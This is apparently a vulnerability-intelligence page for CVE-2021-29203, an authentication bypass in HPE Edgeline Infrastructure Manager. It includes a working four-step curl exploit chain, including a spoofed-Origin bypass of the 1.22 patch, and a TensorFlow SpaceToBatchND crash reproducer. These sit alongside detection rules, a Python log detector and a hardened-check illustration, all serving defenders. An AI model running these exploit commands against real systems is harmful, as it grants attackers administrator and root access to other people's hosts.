CVE-2021-29203
Published 2021-05-06
Priority: P1 (91) · Severity: critical · CVSS 3.1: 9.8
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Exploited in the wild (ITW) · public exploit available · VulnCheck KEV
EPSS: 68.29% (99.2nd percentile)
A security vulnerability has been identified in the HPE Edgeline Infrastructure Manager, also known as HPE Edgeline Infrastructure Management Software, prior to version 1.22. The vulnerability could be remotely exploited to bypass remote authentication leading to execution of arbitrary commands, gaining privileged access, causing denial of service, and changing the configuration. HPE has released a software update to resolve the vulnerability in the HPE Edgeline Infrastructure Manager.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| hp | edgeline_infrastructure_manager | < 1.22 | 1.22 |
| intel | optimization_for_tensorflow | >= 0 < 2.6.4 | 2.6.4 |
| intel | optimization_for_tensorflow | >= 2.7.0 < 2.7.2 | 2.7.2 |
| intel | optimization_for_tensorflow | >= 2.8.0 < 2.8.1 | 2.8.1 |
Only the first row applies to this CVE. The three Intel Optimization for TensorFlow ranges match the fix releases for CVE-2022-29203 (the TensorFlow `SpaceToBatchND` advisory reproduced further down this page) and appear here because of the near-identical identifier. Note also that the detection notes below describe the 1.22 fix as incomplete, with 1.23 required for full mitigation, so "Fixed in 1.22" should be read as the first patched release rather than the safe version.
Detection & IOCs (extracted from sources)

Exploit chain as quoted in the sources (the target host is elided in the originals):

```shell
# 1. Unauthenticated password reset of account 1 on versions before 1.22
curl -k --tlsv1.2 -H 'Content-Type: application/json' -d '{"Password":"attacker"}' -X PATCH https:///redfish/v1/SessionService/ResetPassword/1
# 2. Log in as Administrator with the new password; the response carries X-Auth-Token
curl -ki --tlsv1.2 -H 'content-type: application/json' -d '{"UserName":"Administrator","Password":"attacker"}' https:///redfish/v1/SessionService/Sessions
# 3. With the token, set the account password via AccountService (per the notes below this also resets OS root)
curl -ki --tlsv1.2 -H 'content-type: application/json' -H 'x-auth-token: eda6c27504c54cf68e1d005742c1ef8c573e5e60' -d '{"Password":"attacker"}' -X PATCH https:///redfish/v1/AccountService/Accounts/1
# 4. v1.22 bypass: the same reset with a spoofed Origin header
curl -k --tlsv1.2 -H 'Content-Type: application/json' -H 'Origin: https://127.0.0.1' -d '{"Password":"attacker"}' -X PATCH https:///redfish/v1/SessionService/ResetPassword/1
```
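The fourth command above defeats the 1.22 fix simply by sending the Origin value the server expects. What follows is an added illustration, not HPE code, of why a header-based "console only" check fails and what the decision should rest on instead. The function names, and the peer-address and authenticated-session inputs, are assumptions about how such a gate would be wired in; the page only states that 1.22 compares the Origin header against `https://127.0.0.1`.

```python
import ipaddress

CONSOLE_ORIGIN = "https://127.0.0.1"


def reset_allowed_v122(headers):
    """Model of the 1.22 gate as the detection notes describe it: console
    access is inferred from the Origin header, a value the client chooses."""
    return headers.get("Origin") == CONSOLE_ORIGIN


def reset_allowed_hardened(headers, peer_ip, authenticated):
    """Decide only on facts a remote client cannot set inside the HTTP request:
    the TCP peer address (loopback means the local console) or an already
    authenticated session. The Origin header plays no part in authorization.
    (Hypothetical replacement, not the vendor's 1.23 change.)"""
    try:
        on_console = ipaddress.ip_address(peer_ip).is_loopback
    except ValueError:
        on_console = False  # malformed peer address: treat as remote
    return on_console or authenticated


# Headers of the spoofed request from the curl command above, as the gate
# would see them (constructed for this example).
SPOOFED_HEADERS = {"Content-Type": "application/json", "Origin": CONSOLE_ORIGIN}

if __name__ == "__main__":
    print("1.22 gate, remote peer with spoofed Origin:",
          reset_allowed_v122(SPOOFED_HEADERS))
    print("hardened gate, same request from 203.0.113.7:",
          reset_allowed_hardened(SPOOFED_HEADERS, "203.0.113.7", False))
    print("hardened gate, genuine console peer:",
          reset_allowed_hardened({}, "127.0.0.1", False))
```

If the web application sits behind a reverse proxy, the peer address it sees is the proxy's, so the loopback test has to be enforced at the proxy, or the proxy must pass the client address over a channel the application trusts rather than a header the client can also set. The same applies to the network-layer blocking of the endpoint suggested in the notes below.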
Sigma request signature:

```
PATCH /redfish/v1/SessionService/ResetPassword/1/ HTTP/1.1
```

Detection ideas:
- Detect unauthenticated PATCH requests to /redfish/v1/SessionService/ResetPassword/1. This endpoint should only be accessible from the local console (127.0.0.1), so any remote PATCH to it indicates exploitation of the auth bypass.
- Detect HTTP requests to /redfish/v1/SessionService/ResetPassword/1 that include a spoofed 'Origin: https://127.0.0.1' header from a non-loopback remote IP. This is the v1.22 patch bypass technique.
- Alert on POST to /redfish/v1/SessionService/Sessions with a body containing 'UserName':'Administrator' immediately following a PATCH to /redfish/v1/SessionService/ResetPassword/1 from the same source IP. This indicates execution of the full attack chain.
- Monitor for PATCH requests to /redfish/v1/AccountService/Accounts/1 carrying an X-Auth-Token header. This step resets both the Administrator webapp password and the OS root account password, enabling SSH root access.
- Look for HTTP 201 responses from /redfish/v1/SessionService/Sessions containing both 'X-Auth-Token' and 'PasswordReset' headers. The Nuclei template uses these as confirmation of successful authentication after the bypass.
- Detect a response body containing 'Base.1.0.Created' with HTTP 201 status from /redfish/v1/SessionService/Sessions. This confirms a login session was created after the password reset.

Notes:
- The v1.22 patch is incomplete: it only checks the Origin header value ('https://127.0.0.1') to restrict password reset to console users, and an attacker can trivially spoof this header remotely. Full mitigation requires upgrading to version 1.23.
- The vulnerable endpoint /redfish/v1/SessionService/ResetPassword/1 is decorated with the AllowAll permission class, so no authentication is enforced at the framework level; network-layer blocking of this endpoint is an interim mitigation.
- Exploitation of /redfish/v1/AccountService/Accounts/1 resets BOTH the web application Administrator account AND the OS root account simultaneously, so a successful attack grants SSH root access to the underlying host.
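The detection ideas above as runnable logic over access-log records. This is an added example, not a rule from the page's sources or from the Sigma or Nuclei content. The JSON log format (one record per request with timestamp, source address, method, path, request and response headers, body and status) and the five-minute correlation window for the chain rule are assumptions, and the sample records are constructed rather than captured traffic.

```python
import ipaddress
import json

RESET_PATH = "/redfish/v1/SessionService/ResetPassword/1"
SESSIONS_PATH = "/redfish/v1/SessionService/Sessions"
ACCOUNT_PATH = "/redfish/v1/AccountService/Accounts/1"
CHAIN_WINDOW_S = 300  # assumption: a login within 5 minutes of the reset counts as one chain


def is_loopback(ip):
    """True for 127.0.0.0/8 and ::1; anything unparsable is treated as remote."""
    try:
        return ipaddress.ip_address(ip).is_loopback
    except ValueError:
        return False


def _lower_keys(d):
    return {k.lower(): v for k, v in (d or {}).items()}


def detect(log_lines):
    """Return (ts, src, rule) tuples for the detections listed on this page."""
    alerts = []
    last_remote_reset = {}  # src ip -> ts of its last remote PATCH to the reset endpoint
    for raw in log_lines:
        ev = json.loads(raw)
        ts, src, method = ev["ts"], ev["src"], ev["method"].upper()
        path = ev["path"].rstrip("/")  # the Sigma request line has a trailing slash
        req_h = _lower_keys(ev.get("headers"))
        resp_h = _lower_keys(ev.get("resp_headers"))

        if path == RESET_PATH and method == "PATCH" and not is_loopback(src):
            # Rule 1: any remote PATCH to the reset endpoint is exploitation
            alerts.append((ts, src, "reset_password_remote_patch"))
            last_remote_reset[src] = ts
            if req_h.get("origin") == "https://127.0.0.1":
                # Rule 2: spoofed Origin from a non-loopback peer is the 1.22 bypass
                alerts.append((ts, src, "reset_password_spoofed_origin"))

        elif path == SESSIONS_PATH and method == "POST":
            try:
                creds = json.loads(ev.get("body") or "{}")
            except ValueError:
                creds = {}
            prev = last_remote_reset.get(src)
            if (creds.get("UserName") == "Administrator" and prev is not None
                    and 0 <= ts - prev <= CHAIN_WINDOW_S):
                # Rule 3: Administrator login shortly after a reset from the same source
                alerts.append((ts, src, "admin_login_after_reset"))
            if ev.get("status") == 201 and "x-auth-token" in resp_h and "passwordreset" in resp_h:
                # Rule 5: the 201 + X-Auth-Token + PasswordReset response the template keys on
                alerts.append((ts, src, "session_created_with_passwordreset"))

        elif path == ACCOUNT_PATH and method == "PATCH" and "x-auth-token" in req_h:
            # Rule 4: token-authenticated PATCH to Accounts/1 resets web admin and OS root
            alerts.append((ts, src, "account1_patch_with_token"))
    return alerts


# Constructed sample log, one JSON object per line (not real traffic).
SAMPLE_LOG = [
    json.dumps({"ts": 900, "src": "127.0.0.1", "method": "PATCH", "path": RESET_PATH,
                "headers": {"Origin": "https://127.0.0.1"}, "body": '{"Password":"x"}', "status": 200}),
    json.dumps({"ts": 1000, "src": "203.0.113.7", "method": "PATCH", "path": RESET_PATH + "/",
                "headers": {"Content-Type": "application/json", "Origin": "https://127.0.0.1"},
                "body": '{"Password":"attacker"}', "status": 200}),
    json.dumps({"ts": 1003, "src": "203.0.113.7", "method": "POST", "path": SESSIONS_PATH,
                "headers": {"content-type": "application/json"},
                "body": '{"UserName":"Administrator","Password":"attacker"}', "status": 201,
                "resp_headers": {"X-Auth-Token": "0123abcd", "PasswordReset": "true"}}),
    json.dumps({"ts": 1005, "src": "203.0.113.7", "method": "PATCH", "path": ACCOUNT_PATH,
                "headers": {"x-auth-token": "0123abcd"}, "body": '{"Password":"attacker"}', "status": 200}),
    json.dumps({"ts": 1100, "src": "198.51.100.5", "method": "POST", "path": SESSIONS_PATH,
                "headers": {"content-type": "application/json"},
                "body": '{"UserName":"Administrator","Password":"wrong"}', "status": 401}),
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

Rule 3 keys on the same source address within the window, so an attacker who resets from one host and logs in from another only trips rules 1, 2 and 4; that is why each rule alerts on its own rather than only as part of the chain. The genuine console reset at the top of the sample (peer 127.0.0.1) produces nothing, and the failed Administrator login from a host with no prior reset produces nothing either.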
CVSS provenance
- NVD v3.1: 9.8 CRITICAL (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
- NVD v2.0: 10.0 CRITICAL (AV:N/AC:L/Au:N/C:C/I:C/A:C)
- VulnCheck: 9.8 CRITICAL
GHSA
GHSA-cp6r-8qhx-6m32 · unreviewed · 2022-05-24 · CVE-2021-29203 [CRITICAL] · CWE-287 (Improper Authentication)
A security vulnerability has been identified in the HPE Edgeline Infrastructure Manager, also known as HPE Edgeline Infrastructure Management Software, prior to version 1.22. The vulnerability could be remotely exploited to bypass remote authentication leading to execution of arbitrary commands, gaining privileged access, causing denial of service, and changing the configuration. HPE has released a software update to resolve the vulnerability in the HPE Edgeline Infrastructure Manager.
GHSA (different vulnerability: this advisory is for CVE-2022-29203 in TensorFlow and is shown here only because of the near-identical identifier)
ghsa · 2022-05-24 · CVE-2022-29203 [MEDIUM] · CWE-190 (Integer Overflow or Wraparound)
Integer overflow in `SpaceToBatchND`
### Impact
The implementation of `tf.raw_ops.SpaceToBatchND` (in all backends such as XLA and handwritten kernels) is vulnerable to an integer overflow:
```python
import tensorflow as tf
input = tf.constant(-3.5e+35, shape=[10,19,22], dtype=tf.float32)
block_shape = tf.constant(-1879048192, shape=[2], dtype=tf.int64)
paddings = tf.constant(0, shape=[2,2], dtype=tf.int32)
tf.raw_ops.SpaceToBatchND(input=input, block_shape=block_shape, paddings=paddings)
```
The result of this integer overflow is used to allocate the output tensor, hence we get a denial of service via a `CHECK`-failure (assertion failure), as in [TFSA-2021-198](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-198.md).
### Patches
We have pat
VulnCheck
HP edgeline_infrastructure_manager Missing Authentication for Critical Function (vulncheck · 2021 · CVSS 9.8)
CVE-2021-29203 [CRITICAL]
Affected: HP edgeline_infrastructure_manager
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References:
No detection rules found.
Nuclei
HPE Edgeline Infrastructure Manager <1.22 - Authentication Bypass (nuclei · CVSS 9.8)
CVE-2021-29203 [CRITICAL]
HPE Edgeline Infrastructure Manager, also known as HPE Edgeline Infrastructure Management Software, prior to version 1.22 contains an authentication bypass vulnerability which could be remotely exploited to bypass remote authentication and possibly lead to execution of arbitrary commands, gaining privileged access, causing denial of service, and changing the configuration.
Template (truncated in the source):
```yaml
id: CVE-2021-29203

info:
  name: HPE Edgeline Infrastructure Manager <1.22 - Authentication Bypass
  author: madrobot
  severity: critical
  description: HPE Edgeline Infrastructure Manager, also known as HPE Edgeline Infrastructure Management Software, prior to version 1.22 contains an authentication bypass vulnerability which could be remotely expl
```